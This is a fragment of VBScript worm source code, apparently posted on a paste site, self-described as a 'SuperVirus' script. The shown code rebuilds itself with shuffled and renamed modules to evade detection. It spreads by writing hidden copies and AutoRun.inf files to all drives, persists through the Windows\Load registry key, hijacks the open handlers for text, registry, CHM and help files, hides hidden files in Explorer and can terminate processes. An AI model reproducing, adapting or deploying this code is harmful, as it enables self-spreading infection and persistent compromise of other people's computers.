  576.                     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  577.                     Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  578.             End Select
  579.         Else
  580.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  581.             MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  582.             VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & MainBody & VBCRLF & Tail_V '生成病毒体完整代码
  583.            VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode) '改变模块组合顺序
  584.            VbsCode_<span class="searchlite">Virus</span> = ChangeName(VbsCode_<span class="searchlite">Virus</span>, Names) '改变模块标志名称
  585.            Call MonitorSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  586.         End If
  587.     End Select
  588.     Set objfso = Nothing
  589.     Set objshell = Nothing
  590. End Sub
  591. 'WQKAULMNKKG1_3
  592. 'HJLMRRQRWYOZX1_1
  593. On Error Resume Next
  594. Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
  595. Dim ModelHead, ModelTail
  596. Cnt = 0
  597. CntMax = 1000
  598. Version = "4"
  599. Name_V1 = GetUserName() & ".vbs"
  600. FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
  601. FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
  602. FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
  603. Sum_ModelCode = 26
  604. Head_V= GetHeadTail(0)
  605. Tail_V= GetHeadTail(1)
  606. ModelHead="'HJLMRRQRWYOZX"
  607. ModelTail="'WQKAULMNKKG"
  608. Call <span class="searchlite">Virus</span>Main()
  609. Sub <span class="searchlite">Virus</span>Main()
  610.     On Error Resume Next
  611.     Call ExeVbs_<span class="searchlite">Virus</span>()
  612. End Sub
  613. 'WQKAULMNKKG1_1
  614. 'HJLMRRQRWYOZX2_19
  615. Function GetVersion(objfso, path_v)
  616.     Dim FV, buffer
  617.     Set FV = objfso.OpenTextFile(path_v, 1)
  618.     buffer = FV.ReadAll()
  619.     GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
  620. End Function
  621. Function GetScriptCode(Languages)
  622.     On Error Resume Next
  623.     Dim soj
  624.     For Each soj In document.Scripts
  625.         If LCase(soj.Language) = Languages Then
  626.             Select Case LCase(soj.Language)
  627.                 Case "vbscript"
  628.                     GetScriptCode = soj.Text
  629.                     Exit Function
  630.                 Case "javascript"
  631.                     GetScriptCode = soj.Text
  632.                     Exit Function
  633.             End Select
  634.         End If
  635.     Next
  636. End Function
  637. Function GetSelfCode(objfso, FullPath_Self)
  638.     On Error Resume Next
  639.     Dim n, n1, buffer, Self
  640.     Set Self = objfso.OpenTextFile(FullPath_Self, 1)
  641.     buffer = Self.ReadAll
  642.     n = InStr(buffer, Head_V)
  643.     n1 = InstrRev(buffer, Tail_V)
  644.     buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
  645.     GetSelfCode = buffer
  646.     Self.Close
  647. End Function
  648. Function GetMainBody(vbsCode, Sum_ModelCode)
  649.     Dim i
  650.     For i = 2 To Sum_ModelCode
  651.         GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
  652.     Next
  653. End Function
  654. 'WQKAULMNKKG2_19
  655. 'HJLMRRQRWYOZX2_13
  656. Sub DeSafeSet()
  657.     Dim HLMShow , HCUAdvanced, HCUExplorer
  658.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  659.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  660.     HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
  661.     Call WriteReg (HCUExplorer, 129, "REG_DWORD")
  662.     Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
  663.     Call WriteReg (HLMShow, 0, "REG_DWORD")
  664. End Sub
  665. Sub SafeSet()
  666.     Dim HLMShow , HCUSSHidden, HCUHidden
  667.     Dim HCUExplorer
  668.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  669.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  670.     HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  671.     Call WriteReg (HCUHidden, 1, "REG_DWORD")
  672.     Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
  673.     Call WriteReg (HLMShow, 1, "REG_DWORD")
  674. End Sub
  675. 'WQKAULMNKKG2_13
  676. 'HJLMRRQRWYOZX2_23
  677. Function MakeScript(strCode, T)
  678.     If T = 1 Then
  679.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
  680.     Else
  681.         MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
  682.     End If
  683. End Function
  684. 'WQKAULMNKKG2_23
  685. 'HJLMRRQRWYOZX1_6
  686. Sub AutoRun(objfso, D, vbsCode)
  687.     On Error Resume Next
  688.     Dim path_autorun, path_vbs, inf_autorun
  689.     path_autorun = D & ":\AutoRun.inf"
  690.     path_vbs = D & ":\" & Name_V1
  691.     If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
  692.         If objfso.FileExists(path_autorun) = True Then
  693.             objfso.DeleteFile path_autorun, True
  694.         End If
  695.         If objfso.FileExists(path_vbs) = True Then
  696.             objfso.DeleteFile path_vbs, True
  697.         End If
  698.         Call CopyFile(objfso, vbsCode, path_vbs)
  699.         Call SetFileAttr(objfso, path_vbs)
  700.         inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
  701.         Call CopyFile(objfso, inf_autorun, path_autorun)
  702.         Call SetFileAttr(objfso, path_autorun)
  703.     End If
  704. End Sub
  705. 'WQKAULMNKKG1_6
  706. 'HJLMRRQRWYOZX2_14
  707. Function ReadOK(objfso, FullPath_OK)
  708.     On Error Resume Next
  709.     Dim vf, buffer
  710.     Set vf = objfso.OpenTextFile(FullPath_OK, 1)
  711.     buffer = vf.ReadAll
  712.     ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
  713. End Function
  714. Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
  715.     On Error Resume Next
  716.     Dim vf1
  717.     objfso.DeleteFile FullPath_OK, True
  718.     Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
  719.     vf1.Write "OK" & VBCRLF
  720.     vf1.WriteLine Date()
  721.     vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
  722.     Call SetFileAttr(objfso, FullPath_OK)
  723. End Sub
  724. 'WQKAULMNKKG2_14
  725. 'HJLMRRQRWYOZX2_24
  726. Sub KillProcess(ProcessNames)
  727.     On Error Resume Next
  728.     Dim objShell, intReturn, name_exe
  729.     Set objShell = WScript.CreateObject("WScript.Shell")
  730.     strComputer = "."
  731.     Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  732.     For Each ProcessName in ProcessNames
  733.         Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
  734.         For Each objProcess in colProcessList
  735.             intReturn = objProcess.Terminate
  736.             Select Case intReturn
  737.                 Case 2
  738.                     name_exe = objProcess.Name
  739.                     name_exe = Left(name_exe, Len(name_exe) -4)
  740.                     objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
  741.             End Select
  742.         Next
  743.     Next
  744.     Set objShell = Nothing
  745. End Sub
  746. 'WQKAULMNKKG2_24
  747. 'HJLMRRQRWYOZX1_7
  748. Sub InvadeSystem(objfso, vbsCode)
  749.     On Error Resume Next
  750.     Dim Value, HCULoad, vbsCode_<span class="searchlite">Virus</span>, dc, d
  751.     Value = "%SystemRoot%\System32\WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
  752.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  753.     vbsCode_<span class="searchlite">Virus</span> = vbsCode
  754.     Set dc = objfso.Drives
  755.     For Each d In dc
  756.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  757.             Call AutoRun(objfso, d.DriveLetter, vbsCode_<span class="searchlite">Virus</span>)
  758.         End If
  759.     Next
  760.     If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
  761.         objfso.DeleteFile FullPath_V1 , True
  762.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V1)
  763.         Call SetFileAttr(objfso, FullPath_V1)
  764.     Else
  765.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V1)
  766.         Call SetFileAttr(objfso, FullPath_V1)
  767.     End If
  768.     If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)<Version Then
  769.         objfso.DeleteFile FullPath_V0 , True
  770.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V0)
  771.         Call SetFileAttr(objfso, FullPath_V0)
  772.     Else
  773.         Call CopyFile(objfso, vbsCode_<span class="searchlite">Virus</span>, FullPath_V0)
  774.         Call SetFileAttr(objfso, FullPath_V0)
  775.     End If
  776.     If ReadReg(HCULoad)<> FullPath_V1 Then
  777.         Call WriteReg (HCULoad, FullPath_V1, "")
  778.     End If
  779.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  780.         Call SetTxtFileAss(FullPath_V0)
  781.     End If
  782.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  783.         Call SetRegFileAss(FullPath_V0)
  784.     End If
  785.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  786.         Call SetchmFileAss(FullPath_V0)
  787.     End If
  788.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  789.         Call SethlpFileAss(FullPath_V0)
  790.     End If
  791.     Call DeSafeSet()
  792. End Sub
  793. 'WQKAULMNKKG1_7
  794. 'HJLMRRQRWYOZX2_15
  795. Sub SetFileAttr(objfso, pathf)
  796.     Dim vf
  797.     Set vf = objfso.GetFile(pathf)
  798.     vf.Attributes = 6
  799. End Sub
  800. 'WQKAULMNKKG2_15
  801. 'HJLMRRQRWYOZX2_18
  802. Function IsOK(objfso, Now_V, path_f)
  803.     On Error Resume Next
  804.     Dim vf, p1, p2, p3
  805.     IsOK = False
  806.     Set vf = objfso.OpenTextFile(path_f, 1)
  807.     p1 = Trim(vf.ReadLine)
  808.     p2 = Trim(vf.ReadLine)
  809.     p3 = Trim(vf.ReadLine)
  810.     If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
  811.         IsOK = True
  812.     End If
  813.     If p3 = "Admin" Then
  814.         MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
  815.         IsOK = True
  816.         n = InputBox("0:退出; 1:监视系统; 2:传染文件", "Super<span class="searchlite">Virus</span>脚本测试!")
  817.         If n = 0 Then
  818.             Wscript.Quit
  819.         ElseIf n = 1 Then
  820.             IsOK = True
  821.         ElseIf n = 2 Then
  822.             IsOK = False
  823.         End If
  824.     End If
  825. End Function
  826. 'WQKAULMNKKG2_18
  827. 'rotartsinimdA
Add Comment
Please, Sign In to add comment